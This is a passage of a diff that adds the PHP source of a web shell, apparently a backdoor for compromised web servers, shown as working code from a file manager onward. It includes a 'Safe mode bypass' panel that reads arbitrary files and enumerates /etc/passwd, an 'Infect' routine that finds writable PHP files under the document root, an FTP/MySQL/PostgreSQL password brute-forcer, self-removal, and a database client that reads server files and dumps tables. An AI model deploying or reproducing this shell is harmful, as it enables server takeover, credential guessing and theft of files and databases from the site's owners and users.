+ | $f = urldecode($f); | ||
+ | if(is_dir($f)) | ||
+ | deleteDir($f); | ||
+ | else | ||
+ | @unlink($f); | ||
+ | } | ||
+ | break; | ||
+ | case 'paste': | ||
+ | if($_COOKIE['act'] == 'copy') { | ||
+ | function copy_paste($c,$s,$d){ | ||
+ | if(is_dir($c.$s)){ | ||
+ | mkdir($d.$s); | ||
+ | $h = @opendir($c.$s); | ||
+ | while (($f = @readdir($h)) !== false) | ||
+ | if (($f != ".") and ($f != "..")) | ||
+ | copy_paste($c.$s.'/',$f, $d.$s.'/'); | ||
+ | } elseif(is_file($c.$s)) | ||
+ | @copy($c.$s, $d.$s); | ||
+ | } | ||
+ | foreach($_COOKIE['f'] as $f) | ||
+ | copy_paste($_COOKIE['c'],$f, $GLOBALS['cwd']); | ||
+ | } elseif($_COOKIE['act'] == 'move') { | ||
+ | function move_paste($c,$s,$d){ | ||
+ | if(is_dir($c.$s)){ | ||
+ | mkdir($d.$s); | ||
+ | $h = @opendir($c.$s); | ||
+ | while (($f = @readdir($h)) !== false) | ||
+ | if (($f != ".") and ($f != "..")) | ||
+ | copy_paste($c.$s.'/',$f, $d.$s.'/'); | ||
+ | } elseif(@is_file($c.$s)) | ||
+ | @copy($c.$s, $d.$s); | ||
+ | } | ||
+ | foreach($_COOKIE['f'] as $f) | ||
+ | @rename($_COOKIE['c'].$f, $GLOBALS['cwd'].$f); | ||
+ | } elseif($_COOKIE['act'] == 'zip') { | ||
+ | if(class_exists('ZipArchive')) { | ||
+ | $zip = new ZipArchive(); | ||
+ | if ($zip->open($_POST['p2'], 1)) { | ||
+ | chdir($_COOKIE['c']); | ||
+ | foreach($_COOKIE['f'] as $f) { | ||
+ | if($f == '..') | ||
+ | continue; | ||
+ | if(@is_file($_COOKIE['c'].$f)) | ||
+ | $zip->addFile($_COOKIE['c'].$f, $f); | ||
+ | elseif(@is_dir($_COOKIE['c'].$f)) { | ||
+ | $iterator = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($f.'/', FilesystemIterator::SKIP_DOTS)); | ||
+ | foreach ($iterator as $key=>$value) { | ||
+ | $zip->addFile(realpath($key), $key); | ||
+ | } | ||
+ | } | ||
+ | } | ||
+ | chdir($GLOBALS['cwd']); | ||
+ | $zip->close(); | ||
+ | } | ||
+ | } | ||
+ | } elseif($_COOKIE['act'] == 'unzip') { | ||
+ | if(class_exists('ZipArchive')) { | ||
+ | $zip = new ZipArchive(); | ||
+ | foreach($_COOKIE['f'] as $f) { | ||
+ | if($zip->open($_COOKIE['c'].$f)) { | ||
+ | $zip->extractTo($GLOBALS['cwd']); | ||
+ | $zip->close(); | ||
+ | } | ||
+ | } | ||
+ | } | ||
+ | } elseif($_COOKIE['act'] == 'tar') { | ||
+ | chdir($_COOKIE['c']); | ||
+ | $_COOKIE['f'] = array_map('escapeshellarg', $_COOKIE['f']); | ||
+ | ex('tar cfzv ' . escapeshellarg($_POST['p2']) . ' ' . implode(' ', $_COOKIE['f'])); | ||
+ | chdir($GLOBALS['cwd']); | ||
+ | } | ||
+ | unset($_COOKIE['f']); | ||
+ | setcookie('f', '', time() - 3600); | ||
+ | break; | ||
+ | default: | ||
+ | if(!empty($_POST['p1'])) { | ||
+ | prototype('act', $_POST['p1']); | ||
+ | prototype('f', serialize(@$_POST['f'])); | ||
+ | prototype('c', @$_POST['c']); | ||
+ | } | ||
+ | break; | ||
+ | } | ||
+ | } | ||
+ | hardHeader(); | ||
+ | echo '<h1>File manager</h1><div class=content><script>p1_=p2_=p3_="";</script>'; | ||
+ | $dirContent = hardScandir(isset($_POST['c'])?$_POST['c']:$GLOBALS['cwd']); | ||
+ | if($dirContent === false) { echo 'Can\'t open this folder!';hardFooter(); return; } | ||
+ | global $sort; | ||
+ | $sort = array('name', 1); | ||
+ | if(!empty($_POST['p1'])) { | ||
+ | if(preg_match('!s_([A-z]+)_(\d{1})!', $_POST['p1'], $match)) | ||
+ | $sort = array($match[1], (int)$match[2]); | ||
+ | } | ||
+ | echo "<script> | ||
+ | function sa() { | ||
+ | for(i=0;i<d.files.elements.length;i++) | ||
+ | if(d.files.elements[i].type == 'checkbox') | ||
+ | d.files.elements[i].checked = d.files.elements[0].checked; | ||
+ | } | ||
+ | </script> | ||
+ | <table width='100%' class='main' cellspacing='0' cellpadding='2'> | ||
+ | <form name=files method=post><tr><th width='13px'><input type=checkbox onclick='sa()' class=chkbx></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_name_".($sort[1]?0:1)."\")'>Name</a></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_size_".($sort[1]?0:1)."\")'>Size</a></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_modify_".($sort[1]?0:1)."\")'>Modify</a></th><th>Owner/Group</th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_perms_".($sort[1]?0:1)."\")'>Permissions</a></th><th>Actions</th></tr>"; | ||
+ | $dirs = $files = array(); | ||
+ | $n = count($dirContent); | ||
+ | for($i=0;$i<$n;$i++) { | ||
+ | $ow = @posix_getpwuid(@fileowner($dirContent[$i])); | ||
+ | $gr = @posix_getgrgid(@filegroup($dirContent[$i])); | ||
+ | $tmp = array('name' => $dirContent[$i], | ||
+ | 'path' => $GLOBALS['cwd'].$dirContent[$i], | ||
+ | 'modify' => date('Y-m-d H:i:s', @filemtime($GLOBALS['cwd'] . $dirContent[$i])), | ||
+ | 'perms' => viewPermsColor($GLOBALS['cwd'] . $dirContent[$i]), | ||
+ | 'size' => @filesize($GLOBALS['cwd'].$dirContent[$i]), | ||
+ | 'owner' => $ow['name']?$ow['name']:@fileowner($dirContent[$i]), | ||
+ | 'group' => $gr['name']?$gr['name']:@filegroup($dirContent[$i]) | ||
+ | ); | ||
+ | if(@is_file($GLOBALS['cwd'] . $dirContent[$i])) | ||
+ | $files[] = array_merge($tmp, array('type' => 'file')); | ||
+ | elseif(@is_link($GLOBALS['cwd'] . $dirContent[$i])) | ||
+ | $dirs[] = array_merge($tmp, array('type' => 'link', 'link' => readlink($tmp['path']))); | ||
+ | elseif(@is_dir($GLOBALS['cwd'] . $dirContent[$i])) | ||
+ | $dirs[] = array_merge($tmp, array('type' => 'dir')); | ||
+ | } | ||
+ | $GLOBALS['sort'] = $sort; | ||
+ | function cmp($a, $b) { | ||
+ | if($GLOBALS['sort'][0] != 'size') | ||
+ | return strcmp(strtolower($a[$GLOBALS['sort'][0]]), strtolower($b[$GLOBALS['sort'][0]]))*($GLOBALS['sort'][1]?1:-1); | ||
+ | else | ||
+ | return (($a['size'] < $b['size']) ? -1 : 1)*($GLOBALS['sort'][1]?1:-1); | ||
+ | } | ||
+ | usort($files, "cmp"); | ||
+ | usort($dirs, "cmp"); | ||
+ | $files = array_merge($dirs, $files); | ||
+ | $l = 0; | ||
+ | foreach($files as $f) { | ||
+ | echo '<tr'.($l?' class=l1':'').'><td><input type=checkbox name="f[]" value="'.urlencode($f['name']).'" class=chkbx></td><td><a href=# onclick="'.(($f['type']=='file')?'g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'view\')">'.htmlspecialchars($f['name']):'g(\'FilesMan\',\''.$f['path'].'\');" ' . (empty ($f['link']) ? '' : "title='{$f['link']}'") . '><b>[ ' . htmlspecialchars($f['name']) . ' ]</b>').'</a></td><td>'.(($f['type']=='file')?viewSize($f['size']):$f['type']).'</td><td>'.$f['modify'].'</td><td>'.$f['owner'].'/'.$f['group'].'</td><td><a href=# onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\',\'chmod\')">'.$f['perms'] | ||
+ | .'</td><td><a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'rename\')">R</a> <a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'touch\')">T</a>'.(($f['type']=='file')?' <a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'edit\')">E</a> <a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'download\')">D</a>':'').'</td></tr>'; | ||
+ | $l = $l?0:1; | ||
+ | } | ||
+ | echo "<tr><td colspan=7> | ||
+ | <input type=hidden name=ne value=''> | ||
+ | <input type=hidden name=a value='FilesMan'> | ||
+ | <input type=hidden name=c value='" . htmlspecialchars($GLOBALS['cwd']) ."'> | ||
+ | <input type=hidden name=charset value='". (isset($_POST['charset'])?$_POST['charset']:'')."'> | ||
+ | <select name='p1'><option value='copy'>Copy</option><option value='move'>Move</option><option value='delete'>Delete</option>"; | ||
+ | if(class_exists('ZipArchive')) | ||
+ | echo "<option value='zip'>+ zip</option><option value='unzip'>- zip</option>"; | ||
+ | echo "<option value='tar'>+ tar.gz</option>"; | ||
+ | if(!empty($_COOKIE['act']) && @count($_COOKIE['f'])) | ||
+ | echo "<option value='paste'>â³ Paste</option>"; | ||
+ | echo "</select> "; | ||
+ | if(!empty($_COOKIE['act']) && @count($_COOKIE['f']) && (($_COOKIE['act'] == 'zip') || ($_COOKIE['act'] == 'tar'))) | ||
+ | echo "file name: <input type=text name=p2 value='hard_" . date("Ymd_His") . "." . ($_COOKIE['act'] == 'zip'?'zip':'tar.gz') . "'> "; | ||
+ | echo "<input type='submit' value='>>'></td></tr></form></table></div>"; | ||
+ | hardFooter(); | ||
+ | } | ||
+ | function actionStringTools() { | ||
+ | if(!function_exists('hex2bin')) {function hex2bin($p) {return decbin(hexdec($p));}} | ||
+ | if(!function_exists('binhex')) {function binhex($p) {return dechex(bindec($p));}} | ||
+ | if(!function_exists('hex2ascii')) {function hex2ascii($p){$r='';for($i=0;$i<strLen($p);$i+=2){$r.=chr(hexdec($p[$i].$p[$i+1]));}return $r;}} | ||
+ | if(!function_exists('ascii2hex')) {function ascii2hex($p){$r='';for($i=0;$i<strlen($p);++$i)$r.= sprintf('%02X',ord($p[$i]));return strtoupper($r);}} | ||
+ | if(!function_exists('full_urlencode')) {function full_urlencode($p){$r='';for($i=0;$i<strlen($p);++$i)$r.= '%'.dechex(ord($p[$i]));return strtoupper($r);}} | ||
+ | $stringTools = array( | ||
+ | 'Base64 encode' => 'base64_encode', | ||
+ | 'Base64 decode' => 'base64_decode', | ||
+ | 'Url encode' => 'urlencode', | ||
+ | 'Url decode' => 'urldecode', | ||
+ | 'Full urlencode' => 'full_urlencode', | ||
+ | 'md5 hash' => 'md5', | ||
+ | 'sha1 hash' => 'sha1', | ||
+ | 'crypt' => 'crypt', | ||
+ | 'CRC32' => 'crc32', | ||
+ | 'ASCII to HEX' => 'ascii2hex', | ||
+ | 'HEX to ASCII' => 'hex2ascii', | ||
+ | 'HEX to DEC' => 'hexdec', | ||
+ | 'HEX to BIN' => 'hex2bin', | ||
+ | 'DEC to HEX' => 'dechex', | ||
+ | 'DEC to BIN' => 'decbin', | ||
+ | 'BIN to HEX' => 'binhex', | ||
+ | 'BIN to DEC' => 'bindec', | ||
+ | 'String to lower case' => 'strtolower', | ||
+ | 'String to upper case' => 'strtoupper', | ||
+ | 'Htmlspecialchars' => 'htmlspecialchars', | ||
+ | 'String length' => 'strlen', | ||
+ | ); | ||
+ | if(isset($_POST['ajax'])) { | ||
+ | prototype(md5($_SERVER['HTTP_HOST']).'ajax', true); | ||
+ | ob_start(); | ||
+ | if(in_array($_POST['p1'], $stringTools)) | ||
+ | echo $_POST['p1']($_POST['p2']); | ||
+ | $temp = "document.getElementById('strOutput').style.display='';document.getElementById('strOutput').innerHTML='".addcslashes(htmlspecialchars(ob_get_clean()),"\n\r\t\\'\0")."';\n"; | ||
+ | echo strlen($temp), "\n", $temp; | ||
+ | exit; | ||
+ | } | ||
+ | if(empty($_POST['ajax'])&&!empty($_POST['p1'])) | ||
+ | prototype(md5($_SERVER['HTTP_HOST']).'ajax', 0); | ||
+ | hardHeader(); | ||
+ | echo '<h1>String conversions</h1><div class=content>'; | ||
+ | echo "<form name='toolsForm' onSubmit='if(this.ajax.checked){a(null,null,this.selectTool.value,this.input.value);}else{g(null,null,this.selectTool.value,this.input.value);} return false;'><select name='selectTool'>"; | ||
+ | foreach($stringTools as $k => $v) | ||
+ | echo "<option value='".htmlspecialchars($v)."'>".$k."</option>"; | ||
+ | echo "</select><input type='submit' value='>>'/> <input type=checkbox name=ajax value=1 ".(@$_COOKIE[md5($_SERVER['HTTP_HOST']).'ajax']?'checked':'')."> send using AJAX<br><textarea name='input' style='margin-top:5px' class=bigarea>".(empty($_POST['p1'])?'':htmlspecialchars(@$_POST['p2']))."</textarea></form><pre class='ml1' style='".(empty($_POST['p1'])?'display:none;':'')."margin-top:5px' id='strOutput'>"; | ||
+ | if(!empty($_POST['p1'])) { | ||
+ | if(in_array($_POST['p1'], $stringTools))echo htmlspecialchars($_POST['p1']($_POST['p2'])); | ||
+ | } | ||
+ | echo"</pre></div><br><h1>Search files:</h1><div class=content> | ||
+ | <form onsubmit=\"g(null,this.cwd.value,null,this.text.value,this.filename.value);return false;\"><table cellpadding='1' cellspacing='0' width='50%'> | ||
+ | <tr><td width='1%'>Text:</td><td><input type='text' name='text' style='width:100%'></td></tr> | ||
+ | <tr><td>Path:</td><td><input type='text' name='cwd' value='". htmlspecialchars($GLOBALS['cwd']) ."' style='width:100%'></td></tr> | ||
+ | <tr><td>Name:</td><td><input type='text' name='filename' value='*' style='width:100%'></td></tr> | ||
+ | <tr><td></td><td><input type='submit' value='>>'></td></tr> | ||
+ | </table></form>"; | ||
+ | function hardRecursiveGlob($path) { | ||
+ | if(substr($path, -1) != '/') | ||
+ | $path.='/'; | ||
+ | $paths = @array_unique(@array_merge(@glob($path.$_POST['p3']), @glob($path.'*', GLOB_ONLYDIR))); | ||
+ | if(is_array($paths)&&@count($paths)) { | ||
+ | foreach($paths as $â) { | ||
+ | if(@is_dir($â)){ | ||
+ | if($path!=$â) | ||
+ | hardRecursiveGlob($â); | ||
+ | } else { | ||
+ | if(empty($_POST['p2']) || @strpos(file_get_contents($â), $_POST['p2'])!==false) | ||
+ | echo "<a href='#' onclick='g(\"FilesTools\",null,\"".urlencode($â)."\", \"view\",\"\")'>".htmlspecialchars($â)."</a><br>"; | ||
+ | } | ||
+ | } | ||
+ | } | ||
+ | } | ||
+ | if(@$_POST['p3']) | ||
+ | hardRecursiveGlob($_POST['c']); | ||
+ | echo "</div><br><h1>Search for hash:</h1><div class=content> | ||
+ | <form method='post' target='_blank' name='hf'> | ||
+ | <input type='text' name='hash' style='width:200px;'><br> | ||
+ | <input type='hidden' name='act' value='find'/> | ||
+ | <input type='button' value='hashcracking.ru' onclick=\"document.hf.action='https://hashcracking.ru/index.php';document.hf.submit()\"><br> | ||
+ | <input type='button' value='md5.rednoize.com' onclick=\"document.hf.action='http://md5.rednoize.com/?q='+document.hf.hash.value+'&s=md5';document.hf.submit()\"><br> | ||
+ | <input type='button' value='fakenamegenerator.com' onclick=\"document.hf.action='http://www.fakenamegenerator.com/';document.hf.submit()\"><br> | ||
+ | <input type='button' value='hashcrack.com' onclick=\"document.hf.action='http://www.hashcrack.com/index.php';document.hf.submit()\"><br> | ||
+ | <input type='button' value='tools4noobs.com' onclick=\"document.hf.action='http://www.tools4noobs.com/online_php_functions/';document.hf.submit()\"><br> | ||
+ | <input type='button' value='md5decrypter.com' onclick=\"document.hf.action='http://www.md5decrypter.com/';document.hf.submit()\"><br> | ||
+ | <input type='button' value='artlebedev.ru' onclick=\"document.hf.action='https://www.artlebedev.ru/tools/decoder/';document.hf.submit()\"><br> | ||
+ | </form></div>"; | ||
+ | hardFooter(); | ||
+ | } | ||
+ | function actionSafeMode() { | ||
+ | $temp=''; | ||
+ | ob_start(); | ||
+ | switch($_POST['p1']) { | ||
+ | case 1: | ||
+ | $temp=@tempnam($test, 'cx'); | ||
+ | if(@copy("compress.zlib://".$_POST['p2'], $temp)){ | ||
+ | echo @file_get_contents($temp); | ||
+ | unlink($temp); | ||
+ | } else | ||
+ | echo 'Sorry... Can\'t open file'; | ||
+ | break; | ||
+ | case 2: | ||
+ | $files = glob($_POST['p2'].'*'); | ||
+ | if( is_array($files) ) | ||
+ | foreach ($files as $filename) | ||
+ | echo $filename."\n"; | ||
+ | break; | ||
+ | case 3: | ||
+ | $ch = curl_init("file://".$_POST['p2']."\x00".SELF_PATH); | ||
+ | curl_exec($ch); | ||
+ | break; | ||
+ | case 4: | ||
+ | ini_restore("safe_mode"); | ||
+ | ini_restore("open_basedir"); | ||
+ | include($_POST['p2']); | ||
+ | break; | ||
+ | case 5: | ||
+ | for(;$_POST['p2'] <= $_POST['p3'];$_POST['p2']++) { | ||
+ | $uid = @posix_getpwuid($_POST['p2']); | ||
+ | if ($uid) | ||
+ | echo join(':',$uid)."\n"; | ||
+ | } | ||
+ | break; | ||
+ | case 6: | ||
+ | if(!function_exists('imap_open'))break; | ||
+ | $stream = imap_open($_POST['p2'], "", ""); | ||
+ | if ($stream == FALSE) | ||
+ | break; | ||
+ | echo imap_body($stream, 1); | ||
+ | imap_close($stream); | ||
+ | break; | ||
+ | } | ||
+ | $temp = ob_get_clean(); | ||
+ | hardHeader(); | ||
+ | echo '<h1>Safe mode bypass</h1><div class=content>'; | ||
+ | echo '<span>Copy (read file)</span><form onsubmit=\'g(null,null,"1",this.param.value);return false;\'><input type=text name=param><input type=submit value=">>"></form><br><span>Glob (list dir)</span><form onsubmit=\'g(null,null,"2",this.param.value);return false;\'><input type=text name=param><input type=submit value=">>"></form><br><span>Curl (read file)</span><form onsubmit=\'g(null,null,"3",this.param.value);return false;\'><input type=text name=param><input type=submit value=">>"></form><br><span>Ini_restore (read file)</span><form onsubmit=\'g(null,null,"4",this.param.value);return false;\'><input type=text name=param><input type=submit value=">>"></form><br><span>Posix_getpwuid ("Read" /etc/passwd)</span><table><form onsubmit=\'g(null,null,"5",this.param1.value,this.param2.value);return false;\'><tr><td>From</td><td><input type=text name=param1 value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit value=">>"></form><br><br><span>Imap_open (read file)</span><form onsubmit=\'g(null,null,"6",this.param.value);return false;\'><input type=text name=param><input type=submit value=">>"></form>'; | ||
+ | if($temp) | ||
+ | echo '<pre class="ml1" style="margin-top:5px" id="Output">'.$temp.'</pre>'; | ||
+ | echo '</div>'; | ||
+ | hardFooter(); | ||
+ | } | ||
+ | function actionLogout() { | ||
+ | setcookie(md5($_SERVER['HTTP_HOST']), '', time() - 3600); | ||
+ | die('bye!'); | ||
+ | } | ||
+ | function actionSelfRemove() { | ||
+ | if($_POST['p1'] == 'yes') | ||
+ | if(@unlink(preg_replace('!\(\d+\)\s.*!', '', __FILE__))) | ||
+ | die('Shell has been removed'); | ||
+ | else | ||
+ | echo 'unlink error!'; | ||
+ | if($_POST['p1'] != 'yes') | ||
+ | hardHeader(); | ||
+ | echo '<h1>Suicide</h1><div class=content>Really want to remove the shell?<br><a href=# onclick="g(null,null,\'yes\')">Yes</a></div>'; | ||
+ | hardFooter(); | ||
+ | } | ||
+ | function actionInfect() { | ||
+ | hardHeader(); | ||
+ | echo '<h1>Infect</h1><div class=content>'; | ||
+ | if($_POST['p1'] == 'infect') { | ||
+ | $target=$_SERVER['DOCUMENT_ROOT']; | ||
+ | function ListFiles($dir) { | ||
+ | if($dh = opendir($dir)) { | ||
+ | $files = Array(); | ||
+ | $inner_files = Array(); | ||
+ | while($file = readdir($dh)) { | ||
+ | if($file != "." && $file != "..") { | ||
+ | if(is_dir($dir . "/" . $file)) { | ||
+ | $inner_files = ListFiles($dir . "/" . $file); | ||
+ | if(is_array($inner_files)) $files = array_merge($files, $inner_files); | ||
+ | } else { | ||
+ | array_push($files, $dir . "/" . $file); | ||
+ | } | ||
+ | } | ||
+ | } | ||
+ | closedir($dh); | ||
+ | return $files; | ||
+ | } | ||
+ | } | ||
+ | foreach (ListFiles($target) as $key=>$file){ | ||
+ | $nFile = substr($file, -4, 4); | ||
+ | if($nFile == ".php" ){ | ||
+ | if(($file<>$_SERVER['DOCUMENT_ROOT'].$_SERVER['PHP_SELF'])&&(is_writeable($file))){ | ||
+ | echo "$file<br>"; | ||
+ | $i++; | ||
+ | } | ||
+ | } | ||
+ | } | ||
+ | echo "<font color=red size=14>$i</font>"; | ||
+ | }else{ | ||
+ | echo "<form method=post><input type=submit value=Infect name=infet></form>"; | ||
+ | echo 'Really want to infect the server? <a href=# onclick="g(null,null,\'infect\')">Yes</a></div>'; | ||
+ | } | ||
+ | hardFooter(); | ||
+ | } | ||
+ | function actionBruteforce() { | ||
+ | hardHeader(); | ||
+ | if( isset($_POST['proto']) ) { | ||
+ | echo '<h1>Results</h1><div class=content><span>Type:</span> '.htmlspecialchars($_POST['proto']).' <span>Server:</span> '.htmlspecialchars($_POST['server']).'<br>'; | ||
+ | if( $_POST['proto'] == 'ftp' ) { | ||
+ | function bruteForce($ip,$port,$login,$pass) { | ||
+ | $fp = @ftp_connect($ip, $port?$port:21); | ||
+ | if(!$fp) return false; | ||
+ | $res = @ftp_login($fp, $login, $pass); | ||
+ | @ftp_close($fp); | ||
+ | return $res; | ||
+ | } | ||
+ | } elseif( $_POST['proto'] == 'mysql' ) { | ||
+ | function bruteForce($ip,$port,$login,$pass) { | ||
+ | $res = @mysql_connect($ip.':'.($port?$port:3306), $login, $pass); | ||
+ | @mysql_close($res); | ||
+ | return $res; | ||
+ | } | ||
+ | } elseif( $_POST['proto'] == 'pgsql' ) { | ||
+ | function bruteForce($ip,$port,$login,$pass) { | ||
+ | $str = "host='".$ip."' port='".$port."' user='".$login."' password='".$pass."' dbname=postgres"; | ||
+ | $res = @pg_connect($str); | ||
+ | @pg_close($res); | ||
+ | return $res; | ||
+ | } | ||
+ | } | ||
+ | $success = 0; | ||
+ | $attempts = 0; | ||
+ | $server = explode(":", $_POST['server']); | ||
+ | if($_POST['type'] == 1) { | ||
+ | $temp = @file('/etc/passwd'); | ||
+ | if( is_array($temp) ) | ||
+ | foreach($temp as $line) { | ||
+ | $line = explode(":", $line); | ||
+ | ++$attempts; | ||
+ | if( bruteForce(@$server[0],@$server[1], $line[0], $line[0]) ) { | ||
+ | $success++; | ||
+ | echo '<b>'.htmlspecialchars($line[0]).'</b>:'.htmlspecialchars($line[0]).'<br>'; | ||
+ | } | ||
+ | if(@$_POST['reverse']) { | ||
+ | $tmp = ""; | ||
+ | for($i=strlen($line[0])-1; $i>=0; --$i) | ||
+ | $tmp .= $line[0][$i]; | ||
+ | ++$attempts; | ||
+ | if( bruteForce(@$server[0],@$server[1], $line[0], $tmp) ) { | ||
+ | $success++; | ||
+ | echo '<b>'.htmlspecialchars($line[0]).'</b>:'.htmlspecialchars($tmp); | ||
+ | } | ||
+ | } | ||
+ | } | ||
+ | } elseif($_POST['type'] == 2) { | ||
+ | $temp = @file($_POST['dict']); | ||
+ | if( is_array($temp) ) | ||
+ | foreach($temp as $line) { | ||
+ | $line = trim($line); | ||
+ | ++$attempts; | ||
+ | if( bruteForce($server[0],@$server[1], $_POST['login'], $line) ) { | ||
+ | $success++; | ||
+ | echo '<b>'.htmlspecialchars($_POST['login']).'</b>:'.htmlspecialchars($line).'<br>'; | ||
+ | } | ||
+ | } | ||
+ | } | ||
+ | echo "<span>Attempts:</span> $attempts <span>Success:</span> $success</div><br>"; | ||
+ | } | ||
+ | echo '<h1>FTP bruteforce</h1><div class=content><table><form method=post><tr><td><span>Type</span></td>' | ||
+ | .'<td><select name=proto><option value=ftp>FTP</option><option value=mysql>MySql</option><option value=pgsql>PostgreSql</option></select></td></tr><tr><td>' | ||
+ | .'<input type=hidden name=c value="'.htmlspecialchars($GLOBALS['cwd']).'">' | ||
+ | .'<input type=hidden name=a value="'.htmlspecialchars($_POST['a']).'">' | ||
+ | .'<input type=hidden name=charset value="'.htmlspecialchars($_POST['charset']).'">' | ||
+ | .'<input type=hidden name=ne value="">' | ||
+ | .'<span>Server:port</span></td>' | ||
+ | .'<td><input type=text name=server value="127.0.0.1"></td></tr>' | ||
+ | .'<tr><td><span>Brute type</span></td>' | ||
+ | .'<td><label><input type=radio name=type value="1" checked> /etc/passwd</label></td></tr>' | ||
+ | .'<tr><td></td><td><label style="padding-left:15px"><input type=checkbox name=reverse value=1 checked> reverse (login -> nigol)</label></td></tr>' | ||
+ | .'<tr><td></td><td><label><input type=radio name=type value="2"> Dictionary</label></td></tr>' | ||
+ | .'<tr><td></td><td><table style="padding-left:15px"><tr><td><span>Login</span></td>' | ||
+ | .'<td><input type=text name=login value="root"></td></tr>' | ||
+ | .'<tr><td><span>Dictionary</span></td>' | ||
+ | .'<td><input type=text name=dict value="'.htmlspecialchars($GLOBALS['cwd']).'passwd.dic"></td></tr></table>' | ||
+ | .'</td></tr><tr><td></td><td><input type=submit value=">>"></td></tr></form></table>'; | ||
+ | echo '</div><br>'; | ||
+ | hardFooter(); | ||
+ | } | ||
+ | function actionSql() { | ||
+ | class DbClass { | ||
+ | var $type; | ||
+ | var $link; | ||
+ | var $res; | ||
+ | function DbClass($type) { | ||
+ | $this->type = $type; | ||
+ | } | ||
+ | function connect($host, $user, $pass, $dbname){ | ||
+ | switch($this->type) { | ||
+ | case 'mysql': | ||
+ | if( $this->link = @mysql_connect($host,$user,$pass,true) ) return true; | ||
+ | break; | ||
+ | case 'pgsql': | ||
+ | $host = explode(':', $host); | ||
+ | if(!$host[1]) $host[1]=5432; | ||
+ | if( $this->link = @pg_connect("host={$host[0]} port={$host[1]} user=$user password=$pass dbname=$dbname") ) return true; | ||
+ | break; | ||
+ | } | ||
+ | return false; | ||
+ | } | ||
+ | function selectdb($db) { | ||
+ | switch($this->type) { | ||
+ | case 'mysql': | ||
+ | if (@mysql_select_db($db))return true; | ||
+ | break; | ||
+ | } | ||
+ | return false; | ||
+ | } | ||
+ | function query($str) { | ||
+ | switch($this->type) { | ||
+ | case 'mysql': | ||
+ | return $this->res = @mysql_query($str); | ||
+ | break; | ||
+ | case 'pgsql': | ||
+ | return $this->res = @pg_query($this->link,$str); | ||
+ | break; | ||
+ | } | ||
+ | return false; | ||
+ | } | ||
+ | function fetch() { | ||
+ | $res = func_num_args()?func_get_arg(0):$this->res; | ||
+ | switch($this->type) { | ||
+ | case 'mysql': | ||
+ | return @mysql_fetch_assoc($res); | ||
+ | break; | ||
+ | case 'pgsql': | ||
+ | return @pg_fetch_assoc($res); | ||
+ | break; | ||
+ | } | ||
+ | return false; | ||
+ | } | ||
+ | function listDbs() { | ||
+ | switch($this->type) { | ||
+ | case 'mysql': | ||
+ | return $this->query("SHOW databases"); | ||
+ | break; | ||
+ | case 'pgsql': | ||
+ | return $this->res = $this->query("SELECT datname FROM pg_database WHERE datistemplate!='t'"); | ||
+ | break; | ||
+ | } | ||
+ | return false; | ||
+ | } | ||
+ | function listTables() { | ||
+ | switch($this->type) { | ||
+ | case 'mysql': | ||
+ | return $this->res = $this->query('SHOW TABLES'); | ||
+ | break; | ||
+ | case 'pgsql': | ||
+ | return $this->res = $this->query("select table_name from information_schema.tables where table_schema != 'information_schema' AND table_schema != 'pg_catalog'"); | ||
+ | break; | ||
+ | } | ||
+ | return false; | ||
+ | } | ||
+ | function error() { | ||
+ | switch($this->type) { | ||
+ | case 'mysql': | ||
+ | return @mysql_error(); | ||
+ | break; | ||
+ | case 'pgsql': | ||
+ | return @pg_last_error(); | ||
+ | break; | ||
+ | } | ||
+ | return false; | ||
+ | } | ||
+ | function setCharset($str) { | ||
+ | switch($this->type) { | ||
+ | case 'mysql': | ||
+ | if(function_exists('mysql_set_charset')) | ||
+ | return @mysql_set_charset($str, $this->link); | ||
+ | else | ||
+ | $this->query('SET CHARSET '.$str); | ||
+ | break; | ||
+ | case 'pgsql': | ||
+ | return @pg_set_client_encoding($this->link, $str); | ||
+ | break; | ||
+ | } | ||
+ | return false; | ||
+ | } | ||
+ | function loadFile($str) { | ||
+ | switch($this->type) { | ||
+ | case 'mysql': | ||
+ | return $this->fetch($this->query("SELECT LOAD_FILE('".addslashes($str)."') as file")); | ||
+ | break; | ||
+ | case 'pgsql': | ||
+ | $this->query("CREATE TABLE hard2(file text);COPY hard2 FROM '".addslashes($str)."';select file from hard2;"); | ||
+ | $r=array(); | ||
+ | while($i=$this->fetch()) | ||
+ | $r[] = $i['file']; | ||
+ | $this->query('drop table hard2'); | ||
+ | return array('file'=>implode("\n",$r)); | ||
+ | break; | ||
+ | } | ||
+ | return false; | ||
+ | } | ||
+ | function dump($table, $fp = false) { | ||
+ | switch($this->type) { | ||
+ | case 'mysql': | ||
+ | $res = $this->query('SHOW CREATE TABLE `'.$table.'`'); | ||
+ | $create = mysql_fetch_array($res); | ||
+ | $sql = $create[1].";\n"; | ||
+ | if($fp) fwrite($fp, $sql); else echo($sql); | ||
+ | $this->query('SELECT * FROM `'.$table.'`'); | ||
+ | $i = 0; | ||
+ | $head = true; | ||
+ | while($â = $this->fetch()) { | ||
+ | $sql = ''; | ||
+ | if($i % 1000 == 0) { | ||
+ | $head = true; | ||
+ | $sql = ";\n\n"; | ||
+ | } | ||
+ | $columns = array(); | ||
+ | foreach($â as $k=>$v) { | ||
+ | if($v === null) | ||
+ | $â[$k] = "NULL"; | ||
+ | elseif(is_int($v)) | ||
+ | $â[$k] = $v; | ||
+ | else | ||
+ | $â[$k] = "'".@mysql_real_escape_string($v)."'"; | ||
+ | $columns[] = "`".$k."`"; | ||
+ | } | ||
+ | if($head) { | ||
+ | $sql .= 'INSERT INTO `'.$table.'` ('.implode(", ", $columns).") VALUES \n\t(".implode(", ", $â).')'; | ||
+ | $head = false; | ||
+ | } else | ||
+ | $sql .= "\n\t,(".implode(", ", $â).')'; | ||
+ | if($fp) fwrite($fp, $sql); else echo($sql); | ||
+ | $i++; | ||
+ | } | ||
+ | if(!$head) | ||
+ | if($fp) fwrite($fp, ";\n\n"); else echo(";\n\n"); | ||
+ | break; | ||
+ | case 'pgsql': | ||
